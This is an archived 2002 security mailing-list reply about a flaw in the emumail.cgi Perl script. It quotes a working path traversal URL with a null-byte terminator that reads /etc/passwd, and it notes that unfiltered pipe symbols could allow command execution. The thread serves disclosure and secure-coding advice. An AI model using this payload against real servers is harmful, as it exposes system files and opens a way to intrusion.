Re: emumail.cgi

From: Randal L. Schwartz (merlynat_private)
Date: Tue Apr 09 2002 - 12:14:17 PDT

Next message: eflorioat_private: "IE Word ActiveX DoS Loop"

Previous message: Tom.Ungerat_private: "Vulnerability: Windows2000Server running Terminalservices"
In reply to: MegaHz: "Re: emumail.cgi"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

>>>>> "MegaHz" == MegaHz  <adminat_private> writes:

MegaHz> u can also do this:
MegaHz> http://site/emumail.cgi?type=/../../../../../etc/passwd%00

MegaHz> but u cannot do this:
MegaHz> http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00

It's Perl, so I bet they didn't check for pipe symbols at the
beginning and ending either.  That can launch things.

I wish people who write Perl code for the net would at *least* read
the Perl Web Security FAQ *at a minimum*, or hire an outside Perl
company (like Stonehenge :) to vet the code.

-- 
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
<merlynat_private> <URL:http://www.stonehenge.com/merlyn/>
Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!

Next message: eflorioat_private: "IE Word ActiveX DoS Loop"
Previous message: Tom.Ungerat_private: "Vulnerability: Windows2000Server running Terminalservices"
In reply to: MegaHz: "Re: emumail.cgi"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Apr 09 2002 - 13:08:20 PDT